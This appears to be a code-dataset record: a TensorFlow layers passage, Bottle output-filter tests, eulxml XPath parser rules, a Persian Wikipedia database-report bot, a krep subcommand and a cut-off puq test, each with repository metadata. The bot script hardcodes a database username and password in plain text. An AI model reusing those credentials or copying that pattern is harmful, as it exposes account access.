A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'SeparableConv2d', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
depthwise_shape = [kernel_h, kernel_w,
num_filters_in, depth_multiplier]
depthwise_weights = variables.model_variable(
'depthwise_weights',
shape=depthwise_shape,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
strides = [1, stride_h, stride_w, 1]
if num_outputs is not None:
# Full separable convolution: Depthwise followed by pointwise convolution.
pointwise_shape = [1, 1, depth_multiplier * num_filters_in,
num_outputs]
pointwise_weights = variables.model_variable(
'pointwise_weights',
shape=pointwise_shape,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
outputs = nn.separable_conv2d(inputs,
depthwise_weights,
pointwise_weights,
strides,
padding)
else:
# Depthwise convolution only.
outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding)
num_outputs = depth_multiplier * num_filters_in
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def softmax(logits, scope=None):
"""Performs softmax on Nth dimension of N-dimensional logit tensor.
For two-dimensional logits this reduces to tf.nn.softmax. The N-th dimension
needs to have a specified number of elements (number of classes).
Args:
logits: N-dimensional `Tensor` with logits, where N > 1.
scope: Optional scope for variable_op_scope.
Returns:
a `Tensor` with same shape and type as logits.
"""
# TODO(jrru): Add axis argument which defaults to last dimension.
with variable_scope.variable_op_scope([logits], scope, 'softmax'):
num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
logits_2d = array_ops.reshape(logits, [-1, num_logits])
predictions = nn.softmax(logits_2d)
predictions = array_ops.reshape(predictions, array_ops.shape(logits))
predictions.set_shape(logits.get_shape())
return predictions
def stack(inputs, layer, stack_args, **kwargs):
"""Builds a stack of layers by applying layer repeatedly using stack_args.
`stack` allows you to repeatedly apply the same operation with different
arguments `stack_args[i]`. For each application of the layer, `stack` creates
a new scope appended with an increasing number. For example:
```python
y = stack(x, fully_connected, [32, 64, 128], scope='fc')
# It is equivalent to:
x = fully_connected(x, 32, scope='fc/fc_1')
x = fully_connected(x, 64, scope='fc/fc_2')
y = fully_connected(x, 128, scope='fc/fc_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
layer: A layer with arguments `(inputs, *args, **kwargs)`
stack_args: A list/tuple of parameters for each call of layer.
**kwargs: Extra kwargs for the layer.
Returns:
a `Tensor` result of applying the stacked layers.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
if not isinstance(stack_args, (list, tuple)):
raise ValueError('stack_args need to be a list or tuple')
with variable_scope.variable_op_scope([inputs], scope, 'Stack'):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'stack'
outputs = inputs
for i in range(len(stack_args)):
kwargs['scope'] = scope + '_' + str(i+1)
layer_args = stack_args[i]
if not isinstance(layer_args, (list, tuple)):
layer_args = [layer_args]
outputs = layer(outputs, *layer_args, **kwargs)
return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
"""Normalizes the given input across the specified dimension to unit length.
Note that the rank of `input` must be known.
Args:
inputs: A `Tensor` of arbitrary size.
dim: The dimension along which the input is normalized.
epsilon: A small value to add to the inputs to avoid dividing by zero.
scope: Optional scope for variable_op_scope.
Returns:
The normalized `Tensor`.
Raises:
ValueError: If dim is smaller than the number of dimensions in 'inputs'.
"""
with variable_scope.variable_op_scope([inputs], scope, 'UnitNorm'):
if not inputs.get_shape():
raise ValueError('The input rank must be known.')
input_rank = len(inputs.get_shape().as_list())
if dim < 0 or dim >= input_rank:
raise ValueError(
'dim must be positive but smaller than the input rank.')
lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
math_ops.square(inputs), dim, True))
multiples = []
if dim > 0:
multiples.append(array_ops.ones([dim], dtypes.int32))
multiples.append(array_ops.slice(array_ops.shape(inputs), [dim], [1]))
if dim < (input_rank - 1):
multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
multiples = array_ops.concat(0, multiples)
return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def legacy_fully_connected(x,
num_output_units,
activation_fn=None,
weight_init=initializers.xavier_initializer(),
bias_init=init_ops.zeros_initializer,
name=None,
weight_collections=(ops.GraphKeys.WEIGHTS,),
bias_collections=(ops.GraphKeys.BIASES,),
output_collections=(ops.GraphKeys.ACTIVATIONS,),
trainable=True,
weight_regularizer=None,
bias_regularizer=None):
# pylint: disable=anomalous-backslash-in-string
r"""Adds the parameters for a fully connected layer and returns the output.
A fully connected layer is generally defined as a matrix multiply:
`y = f(w * x + b)` where `f` is given by `activation_fn`. If
`activation_fn` is `None`, the result of `y = w * x + b` is
returned.
If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
multiply along the first dimensions. The result r is a tensor of shape
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
where \\\( r_{i_0, ..., i_{n-1}, k} =
\\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
This is accomplished by reshaping `x` to 2-D
[\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
before the matrix multiply and afterwards reshaping it to
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].
This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
`bias_init` to `None`.
The variable creation is compatible with `tf.variable_scope` and so can be
reused with `tf.variable_scope` or `tf.make_template`.
Most of the details of variable creation can be controlled by specifying the
initializers (`weight_init` and `bias_init`) and in which collections to place
the created variables (`weight_collections` and `bias_collections`; note that
the variables are always added to the `VARIABLES` collection). The output of
the layer can be placed in custom collections using `output_collections`.
The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
respectively.
A per layer regularization can be specified by setting `weight_regularizer`
and `bias_regularizer`, which are applied to the weights and biases
respectively, and whose output is added to the `REGULARIZATION_LOSSES`
collection.
Args:
x: The input `Tensor`.
num_output_units: The size of the output.
activation_fn: A function that requires a single Tensor that is applied as a
non-linearity. If None is used, do not apply any activation.
weight_init: An optional weight initialization, defaults to
`xavier_initializer`.
bias_init: An initializer for the bias, defaults to 0. Set to `None` in
order to disable bias.
name: The name for this operation is used to name operations and to find
variables. If specified it must be unique for this scope, otherwise a
unique name starting with "fully_connected" will be created. See
`tf.variable_op_scope` for details.
weight_collections: List of graph collections to which weights are added.
bias_collections: List of graph collections to which biases are added.
output_collections: List of graph collections to which outputs are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
weight_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for weights.
bias_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for biases.
Returns:
The output of the fully connected layer.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
with variable_scope.variable_op_scope([x], name, 'fully_connected'):
x = ops.convert_to_tensor(x)
dims = x.get_shape().dims
if dims is None:
raise ValueError('dims of x must be known but is None')
if len(dims) < 2:
raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
num_input_units = dims[-1].value
if num_input_units is None:
raise ValueError('last dimension of x must be known but is None')
dtype = x.dtype.base_dtype
weight_collections = set(list(weight_collections or []) +
[ops.GraphKeys.VARIABLES])
w = variable_scope.get_variable('weights',
shape=[num_input_units, num_output_units],
dtype=dtype,
initializer=weight_init,
collections=weight_collections,
regularizer=weight_regularizer,
trainable=trainable)
x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
[-1, num_input_units])
y = standard_ops.matmul(x_2_dim, w)
if bias_init is not None:
bias_collections = set(list(bias_collections or []) +
[ops.GraphKeys.VARIABLES])
b = variable_scope.get_variable('bias',
shape=[num_output_units],
dtype=dtype,
initializer=bias_init,
collections=bias_collections,
regularizer=bias_regularizer,
trainable=trainable)
y = nn.bias_add(y, b)
if len(dims) > 2:
out_shape = array_ops.unpack(array_ops.shape(x))
out_shape[-1] = num_output_units
y = array_ops.reshape(y, array_ops.pack(out_shape))
static_shape = x.get_shape().as_list()
static_shape[-1] = num_output_units
y.set_shape(static_shape)
return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Simple alias.
conv2d = convolution2d
conv2d_transpose = convolution2d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
|
apache-2.0
| 7,947,719,514,058,417,000 | 42.465723 | 80 | 0.631842 | false |
adragomir/bottle
|
test/test_outputfilter.py
|
1
|
5031
|
# -*- coding: utf-8 -*-
'''Everything returned by Bottle()._cast() MUST be WSGI compatiple.'''
import unittest
import bottle
from tools import ServerTestBase, tob, tobs
class TestOutputFilter(ServerTestBase):
''' Tests for WSGI functionality, routing and output casting (decorators) '''
def test_bytes(self):
self.app.route('/')(lambda: tob('test'))
self.assertBody('test')
def test_bytearray(self):
self.app.route('/')(lambda: map(tob, ['t', 'e', 'st']))
self.assertBody('test')
def test_tuple(self):
self.app.route('/')(lambda: ('t', 'e', 'st'))
self.assertBody('test')
def test_emptylist(self):
self.app.route('/')(lambda: [])
self.assertBody('')
def test_none(self):
self.app.route('/')(lambda: None)
self.assertBody('')
def test_illegal(self):
self.app.route('/')(lambda: 1234)
self.assertStatus(500)
self.assertInBody('Unhandled exception')
def test_error(self):
self.app.route('/')(lambda: 1/0)
self.assertStatus(500)
self.assertInBody('ZeroDivisionError')
def test_fatal_error(self):
@self.app.route('/')
def test(): raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, self.assertStatus, 500)
def test_file(self):
self.app.route('/')(lambda: tobs('test'))
self.assertBody('test')
def test_unicode(self):
self.app.route('/')(lambda: u'äöüß')
self.assertBody(u'äöüß'.encode('utf8'))
self.app.route('/')(lambda: [u'äö',u'üß'])
self.assertBody(u'äöüß'.encode('utf8'))
@self.app.route('/')
def test5():
bottle.response.content_type='text/html; charset=iso-8859-15'
return u'äöüß'
self.assertBody(u'äöüß'.encode('iso-8859-15'))
@self.app.route('/')
def test5():
bottle.response.content_type='text/html'
return u'äöüß'
self.assertBody(u'äöüß'.encode('utf8'))
def test_json(self):
self.app.route('/')(lambda: {'a': 1})
if bottle.json_dumps:
self.assertBody(bottle.json_dumps({'a': 1}))
self.assertHeader('Content-Type','application/json')
else:
print "Warning: No json module installed."
def test_custom(self):
self.app.route('/')(lambda: 5)
self.app.add_filter(int, lambda x: str(x))
self.assertBody('5')
def test_generator_callback(self):
@self.app.route('/')
def test():
bottle.response.headers['Test-Header'] = 'test'
yield 'foo'
self.assertBody('foo')
self.assertHeader('Test-Header', 'test')
def test_empty_generator_callback(self):
@self.app.route('/')
def test():
yield
bottle.response.headers['Test-Header'] = 'test'
self.assertBody('')
self.assertHeader('Test-Header', 'test')
def test_error_in_generator_callback(self):
@self.app.route('/')
def test():
yield 1/0
self.assertStatus(500)
self.assertInBody('ZeroDivisionError')
def test_fatal_error_in_generator_callback(self):
@self.app.route('/')
def test():
yield
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, self.assertStatus, 500)
def test_httperror_in_generator_callback(self):
@self.app.route('/')
def test():
yield
bottle.abort(404, 'teststring')
self.assertInBody('teststring')
self.assertInBody('Error 404: Not Found')
self.assertStatus(404)
def test_httpresponse_in_generator_callback(self):
@self.app.route('/')
def test():
yield bottle.HTTPResponse('test')
self.assertBody('test')
def test_unicode_generator_callback(self):
@self.app.route('/')
def test():
yield u'äöüß'
self.assertBody(u'äöüß'.encode('utf8'))
def test_invalid_generator_callback(self):
@self.app.route('/')
def test():
yield 1234
self.assertStatus(500)
self.assertInBody('Unsupported response type')
def test_cookie(self):
""" WSGI: Cookies """
@bottle.route('/cookie')
def test():
bottle.response.COOKIES['a']="a"
bottle.response.set_cookie('b', 'b')
bottle.response.set_cookie('c', 'c', path='/')
return 'hello'
try:
c = self.urlopen('/cookie')['header'].get_all('Set-Cookie', '')
except:
c = self.urlopen('/cookie')['header'].get('Set-Cookie', '').split(',')
c = [x.strip() for x in c]
self.assertTrue('a=a' in c)
self.assertTrue('b=b' in c)
self.assertTrue('c=c; Path=/' in c)
if __name__ == '__main__': #pragma: no cover
unittest.main()
|
mit
| -7,577,298,989,531,907,000 | 30.588608 | 82 | 0.5556 | false |
emory-libraries/eulxml
|
eulxml/xpath/parserules.py
|
1
|
7468
|
# file eulxml/xpath/parserules.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""XPath parsing rules.
To understand how this module works, it is valuable to have a strong
understanding of the `ply <http://www.dabeaz.com/ply/>` module.
"""
from __future__ import unicode_literals
from eulxml.xpath import ast
from eulxml.xpath.lexrules import tokens
precedence = (
('left', 'OR_OP'),
('left', 'AND_OP'),
('left', 'EQUAL_OP'),
('left', 'REL_OP'),
('left', 'PLUS_OP', 'MINUS_OP'),
('left', 'MULT_OP', 'DIV_OP', 'MOD_OP'),
('right', 'UMINUS_OP'),
('left', 'UNION_OP'),
)
#
# basic expressions
#
def p_expr_boolean(p):
"""
Expr : Expr OR_OP Expr
| Expr AND_OP Expr
| Expr EQUAL_OP Expr
| Expr REL_OP Expr
| Expr PLUS_OP Expr
| Expr MINUS_OP Expr
| Expr MULT_OP Expr
| Expr DIV_OP Expr
| Expr MOD_OP Expr
| Expr UNION_OP Expr
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
def p_expr_unary(p):
"""
Expr : MINUS_OP Expr %prec UMINUS_OP
"""
p[0] = ast.UnaryExpression(p[1], p[2])
#
# path expressions
#
def p_path_expr_binary(p):
"""
Expr : FilterExpr PATH_SEP RelativeLocationPath
| FilterExpr ABBREV_PATH_SEP RelativeLocationPath
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
def p_path_expr_unary(p):
"""
Expr : RelativeLocationPath
| AbsoluteLocationPath
| AbbreviatedAbsoluteLocationPath
| FilterExpr
"""
p[0] = p[1]
#
# paths
#
def p_absolute_location_path_rootonly(p):
"""
AbsoluteLocationPath : PATH_SEP
"""
p[0] = ast.AbsolutePath(p[1])
def p_absolute_location_path_subpath(p):
"""
AbsoluteLocationPath : PATH_SEP RelativeLocationPath
"""
p[0] = ast.AbsolutePath(p[1], p[2])
def p_abbreviated_absolute_location_path(p):
"""
AbbreviatedAbsoluteLocationPath : ABBREV_PATH_SEP RelativeLocationPath
"""
p[0] = ast.AbsolutePath(p[1], p[2])
def p_relative_location_path_simple(p):
"""
RelativeLocationPath : Step
"""
p[0] = p[1]
def p_relative_location_path_binary(p):
"""
RelativeLocationPath : RelativeLocationPath PATH_SEP Step
| RelativeLocationPath ABBREV_PATH_SEP Step
"""
p[0] = ast.BinaryExpression(p[1], p[2], p[3])
#
# path steps
#
def p_step_nodetest(p):
"""
Step : NodeTest
"""
p[0] = ast.Step(None, p[1], [])
def p_step_nodetest_predicates(p):
"""
Step : NodeTest PredicateList
"""
p[0] = ast.Step(None, p[1], p[2])
def p_step_axis_nodetest(p):
"""
Step : AxisSpecifier NodeTest
"""
p[0] = ast.Step(p[1], p[2], [])
def p_step_axis_nodetest_predicates(p):
"""
Step : AxisSpecifier NodeTest PredicateList
"""
p[0] = ast.Step(p[1], p[2], p[3])
def p_step_abbrev(p):
"""
Step : ABBREV_STEP_SELF
| ABBREV_STEP_PARENT
"""
p[0] = ast.AbbreviatedStep(p[1])
#
# axis specifier
#
def p_axis_specifier_full(p):
"""
AxisSpecifier : AXISNAME AXIS_SEP
"""
p[0] = p[1]
def p_axis_specifier_abbrev(p):
"""
AxisSpecifier : ABBREV_AXIS_AT
"""
p[0] = '@'
#
# node test
#
def p_node_test_name_test(p):
"""
NodeTest : NameTest
"""
p[0] = p[1]
def p_node_test_type_simple(p):
"""
NodeTest : NODETYPE OPEN_PAREN CLOSE_PAREN
"""
# NOTE: Strictly speaking p[1] must come from a list of recognized
# NodeTypes. Since we don't actually do anything with them, we don't
# need to recognize them.
p[0] = ast.NodeType(p[1])
def p_node_test_type_literal(p):
"""
NodeTest : NODETYPE OPEN_PAREN LITERAL CLOSE_PAREN
"""
# NOTE: Technically this only allows 'processing-instruction' for p[1].
# We'll go light on that restriction since we don't actually need it for
# processing.
p[0] = ast.NodeType(p[1], p[3])
#
# name test
#
def p_name_test_star(p):
"""
NameTest : STAR_OP
"""
p[0] = ast.NameTest(None, p[1])
def p_name_test_prefix_star(p):
"""
NameTest : NCNAME COLON STAR_OP
"""
p[0] = ast.NameTest(p[1], p[3])
def p_name_test_qname(p):
"""
NameTest : QName
"""
qname = p[1]
p[0] = ast.NameTest(qname[0], qname[1])
#
# qname
#
def p_qname_prefixed(p):
"""
QName : NCNAME COLON NCNAME
"""
p[0] = (p[1], p[3])
def p_qname_unprefixed(p):
"""
QName : NCNAME
"""
p[0] = (None, p[1])
def p_funcqname_prefixed(p):
"""
FuncQName : NCNAME COLON FUNCNAME
"""
p[0] = (p[1], p[3])
def p_funcqname_unprefixed(p):
"""
FuncQName : FUNCNAME
"""
p[0] = (None, p[1])
#
# filter expressions
#
def p_filter_expr_simple(p):
"""
FilterExpr : VariableReference
| LITERAL
| Number
| FunctionCall
"""
# FIXME: | FunctionCall moved so as not to conflict with NodeTest :
# FunctionCall
p[0] = p[1]
def p_filter_expr_grouped(p):
"""
FilterExpr : OPEN_PAREN Expr CLOSE_PAREN
"""
p[0] = p[2]
def p_filter_expr_predicate(p):
"""
FilterExpr : FilterExpr Predicate
"""
if not hasattr(p[1], 'append_predicate'):
p[1] = ast.PredicatedExpression(p[1])
p[1].append_predicate(p[2])
p[0] = p[1]
#
# predicates
#
def p_predicate_list_single(p):
"""
PredicateList : Predicate
"""
p[0] = [p[1]]
def p_predicate_list_recursive(p):
"""
PredicateList : PredicateList Predicate
"""
p[0] = p[1]
p[0].append(p[2])
def p_predicate(p):
"""
Predicate : OPEN_BRACKET Expr CLOSE_BRACKET
"""
p[0] = p[2]
#
# variable
#
def p_variable_reference(p):
"""
VariableReference : DOLLAR QName
"""
p[0] = ast.VariableReference(p[2])
#
# number
#
def p_number(p):
"""
Number : FLOAT
| INTEGER
"""
p[0] = p[1]
#
# funcall
#
def p_function_call(p):
"""
FunctionCall : FuncQName FormalArguments
"""
# FIXME: This production also matches NodeType() or
# processing-instruction("foo"), which are technically NodeTest
qname = p[1]
p[0] = ast.FunctionCall(qname[0], qname[1], p[2])
def p_formal_arguments_empty(p):
"""
FormalArguments : OPEN_PAREN CLOSE_PAREN
"""
p[0] = []
def p_formal_arguments_list(p):
"""
FormalArguments : OPEN_PAREN ArgumentList CLOSE_PAREN
"""
p[0] = p[2]
def p_argument_list_single(p):
"""
ArgumentList : Expr
"""
p[0] = [p[1]]
def p_argument_list_recursive(p):
"""
ArgumentList : ArgumentList COMMA Expr
"""
p[0] = p[1]
p[0].append(p[3])
#
# error handling
#
def p_error(p):
# In some cases, p could actually be None.
# However, stack trace should have enough information to identify the problem.
raise RuntimeError("Syntax error at '%s'" % repr(p))
|
apache-2.0
| 4,975,221,762,441,156,000 | 19.293478 | 82 | 0.584226 | false |
PersianWikipedia/Database-reports
|
zzkootah.py
|
1
|
7721
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Reza(User:reza1615), 2011
# MIT license
import catlib ,pagegenerators
import wikipedia,urllib,gzip,codecs,re
import MySQLdb as mysqldb
import config,os
from datetime import timedelta,datetime
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
internetoff=False #-----------------------------------bedoone internet------------------------
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
text=u' '
file_content=u' '
now = datetime.now()
yesterday=str(now-timedelta(1)).replace('-','').split(' ')[0].strip()
todayup=u"'''بهروز شده توسط ربات در تاریخ''''': ~~~~~''\n\n"
titlechart=u'!رتبه!! صفحه!!برچسبها!!میانویکی!!تعداد پیوند به!! تعداد رده!!تعداد نگاره!!حجم صغحه (بایت){{سخ}}حجم کمتر از ۵۰۰ بایت رنگی نمایش داده میشود !!توضیحات دیگر'+u'\n|-\n'
uppage=todayup+u'\n{| class="wikitable sortable"\n'+titlechart
downpage=u'\n|}\n[[رده:ویکیپدیا]]\n[[رده:آمارهای دیتابیس]]\n'
count=0
lines=u' '
#------------------------------------------------------------ sql part
siteq = wikipedia.getSite("fa")
query = open("/home/reza/pywikipedia/koochak.sql").read()
#wikipedia.output(u'Executing query:\n%s' % query)
conn = mysqldb.connect("fawiki.labsdb.org",
user = 'reza',
passwd = 'reza1615')
cursor = conn.cursor()
#query = query.encode(site.encoding())
cursor.execute(query)
results = cursor.fetchall()
#------------------------------sql finsh------------------
def condition(link):
wikipedia.config.put_throttle = 0
wikipedia.put_throttle.setDelay()
if internetoff==True:
return u'||\n|-\n'
alarm=' '
try:
pagef = wikipedia.Page( wikipedia.getSite( u'fa' ),link )
wikipedia.output( u'opening %s ...' % pagef.title() )
text = pagef.get()
alarm+=u' '
objective=u'||'
#----------------------------------------------refrences-------------------
if text.find(u'{{منبع')!=-1:
alarm+=u'بدون منبع ،'
if text.find(u'{{حذف')!=-1:
alarm+=u'حذف،'
if text.find(u'{{بهبود')!=-1:
alarm+=u'بهبود منبع ،'
if text.find(u'{{بدون منبع')!=-1:
alarm+=u'بدون منبع ،'
if text.find(u'{{متخصص')!=-1:
alarm+=u'متخصص ،'
if text.find(u'{{نوشتار خوب}}')!=-1:
alarm+=u'{{قلم رنگ|سورمهای|فیلی|مقاله خوب}}'
if text.find(u'{{پیشنهاد برگزیدگی}}')!=-1:
alarm+=u'{{قلم رنگ|بنفش|زرد|پیشنهاد برگزیدگی}}'
if text.find(u'{{پیشنهاد خوبیدگی}}')!=-1:
alarm+=u'{{قلم رنگ|سبز|زرد|پیشنهاد خوبیدگی}}'
if text.find(u'{{مقاله برگزیده}}')!=-1:
alarm+=u'{{قلم رنگ|سفید|خاکستری|مقاله برگزیده}}'
#----------------------------------------------khord----------------------
if text.find(u'خرد}}')!=-1:
if text.find(u'{{بخش-خرد')!=-1:
alarm+=u'{{قلم رنگ|بنفش||بخش خرد}} ،'
else:
alarm+=u'خرد ،'
if text.find(u'نیاز}}')!=-1:
alarm+=u'نیازمند به ،'
if text.find(u'{{طرفداری')!=-1:
alarm+=u'عدمبیطرفی ،'
if text.find(u'{{درستی')!=-1:
alarm+=u'عدم توافق در درستی ،'
if text.find(u'{{ادغام')!=-1:
alarm+=u'ادغام ،'
if text.find(u'{{در دست ویرایش')!=-1:
alarm+=u'ویرایش ،'
if text.find(u'{{ویکیسازی')!=-1:
alarm+=u'ویکیسازی ،'
if text.find(u'{{تمیزکاری')!=-1:
alarm+=u'تمیزکاری ،'
if text.find(u'{{لحن')!=-1:
alarm+=u'لحن ،'
if text.find(u'{{اصلاح')!=-1:
alarm+=u'نیازمند ترجمه ،'
if text.find(u'{{ابهامزدایی')!=-1:
alarm+=u'ابهامزدایی ،'
if text.find(u'{{بازنویسی')!=-1:
alarm+=u'بازنویسی ،'
if text.find(u'{{به روز رسانی')!=-1:
alarm+=u'بهروز رسانی ،'
if text.find(u'{{بهروز رسانی')!=-1:
alarm+=u'بهروز رسانی ،'
#--------------------------------------------------------------------------
if alarm[-1]==u'،':
alarm=alarm[0:-1].strip()
interwikis=u'{{subst:formatnum:'+str(len(pagef.interwiki()) ).strip()+u'}}'
cats=u'{{subst:formatnum:'+str(len(pagef.categories(api=True))).strip()+u'}}'
linked=u'{{subst:formatnum:'+str(len(pagef.linkedPages())).strip()+u'}}'
image=u'{{subst:formatnum:'+str(len(pagef.imagelinks())).strip()+u'}}'
alarm+=u'||'+interwikis+u'||'+linked+u'||'+cats+u'||'+image+u'||{{حجم مقاله|'+pagef.title().strip()+u'|500}}||\n|-\n'
return alarm
except wikipedia.IsRedirectPage:
return False
except:
return False
savetext,rowfa,rowfaend=u' ',u' ',u' '
count=0
for row in results:
passport=True
line=unicode(row[0],'UTF-8')
wikipedia.output(line)
blacklists=[u'۰',u'۱',u'۲',u'۳',u'۴',u'۵',u'۶',u'۷',u'۸',u'۹']
for item in blacklists:
if line.find(item)!=-1:
passport=False
break
if passport:
conditions=condition(line.replace(u'_',u' '))
if conditions:
count+=1
text+=u'|{{subst:formatnum:'+str(count)+u'}}||{{مقاله|'+line.replace(u'_',u' ').strip()+u'}}||'+conditions
if count==500 or count==1000 or count==1500:
text=uppage+text.strip()+downpage
#---------------------------------------------------------wiki upload----------------------
countf=str(count).replace(u'0',u'۰').replace(u'1',u'۱').replace(u'2',u'۲').replace(u'3',u'۳').replace(u'4',u'۴').replace(u'5',u'۵').replace(u'6',u'۶').replace(u'7',u'۷').replace(u'8',u'۸').replace(u'9',u'۹')
countl=str(count-499).replace(u'0',u'۰').replace(u'1',u'۱').replace(u'2',u'۲').replace(u'3',u'۳').replace(u'4',u'۴').replace(u'5',u'۵').replace(u'6',u'۶').replace(u'7',u'۷').replace(u'8',u'۸').replace(u'9',u'۹')
uptitle=u'ویکیپدیا:گزارش دیتابیس/فهرست مقالههای کوتاه از %s تا %s/فهرست' %(countl,countf)
#uptitle=u'کاربر:Reza1615/test07'+str(count)
pagefa = wikipedia.Page( wikipedia.getSite( u'fa' ),uptitle)
pagefa.put(text, u'ربات:بهروز رسانی', minorEdit = True)
del text
text=u' '
sign_page=u'ویکیپدیا:گزارش دیتابیس/فهرست مقالههای کوتاه/امضا'
madak=u'~~~~~'
site=wikipedia.getSite('fa')
sign_page=wikipedia.Page(site,sign_page)
sign_page.put(madak,u'ربات:تاریخ بروز رسانی')
|
mit
| -4,913,412,699,687,561,000 | 44.486486 | 234 | 0.486337 | false |
cadappl/krep
|
krep_subcmds/topic_subcmd.py
|
1
|
2707
|
import re
from topics import all_topics, SubCommand
class TopicSubcmd(SubCommand):
COMMAND = 'topic'
help_summary = 'Print the topic summaries'
help_usage = '''\
%prog <topic> ...
Display all registered topics of the program for debugging purpose.
Topic contains the classes that can be imported from "topics", which
is the official way to use by the implemented sub-commands.
Environment variables KREP_EXTRA_PATH and KREP_TOPIC_PATH could define
new external sub-commands. Try to define the variables if required.'''
@staticmethod
def _print_formatted_topic(topics, print_name=True):
lines = list()
topfmt = '%(summary)s'
if print_name:
longest = max([len(topic) for topic in topics])
topfmt = ' %%(name)-%ds%%(summary)s' % (longest + 2)
for name in topics:
value = dict()
if print_name:
value['name'] = name
summary = ((all_topics[name] or '').split('\n'))[0].strip('.')
while len(summary) > 60:
splits = re.split(r'\s+', summary.strip())
if len(splits) > 1:
summary = ' '.join(splits[:-1]) + '...'
else:
summary = summary[:57] + '...'
value['summary'] = summary or 'No description'
lines.append(topfmt % value)
if len(lines) > 0:
lines.sort()
print('\n'.join(lines))
def _print_all_topics(self): # pylint: disable=R0201
print('The topics of krep are:')
print('')
TopicSubcmd._print_formatted_topic(all_topics.keys())
print('\nSee more info with "krep topic <topic>"')
def _print_topic(self, topics): # pylint: disable=R0201
aliases = dict()
for name in all_topics.keys():
alias = ''
for i in range(len(name)):
if 'A' <= name[i] <= 'Z':
alias += '_'
alias += name[i].lower()
aliases[name] = name
aliases[alias.lstrip('_')] = name
topics = list(topics)
for topic in topics[:]:
topics.remove(topic)
if topic not in aliases:
print('krep: "%s" is not a known topic' % topic)
else:
topics.append(aliases[topic])
if len(topics) > 1:
TopicSubcmd._print_formatted_topic(topics)
elif len(topics) == 1:
print(all_topics[topics[0]])
def execute(self, options, *args): # pylint: disable=W0613
if len(args) == 0 or 'all' in args:
self._print_all_topics()
else:
self._print_topic(args)
|
lgpl-3.0
| 8,216,177,758,233,503,000 | 30.114943 | 74 | 0.533801 | false |
c-PRIMED/puq
|
test/UniformPDF_test.py
|
1
|
4485
|
#! /usr/bin/env python
'''
Testsuite for the UniformPDF class
'''
from __future__ import absolute_import, division, print_function
import numpy as np
from puq import *
import scipy.stats as stats
def _hisplot(y, nbins):
n, bins = np.histogram(y, nbins, normed=True)
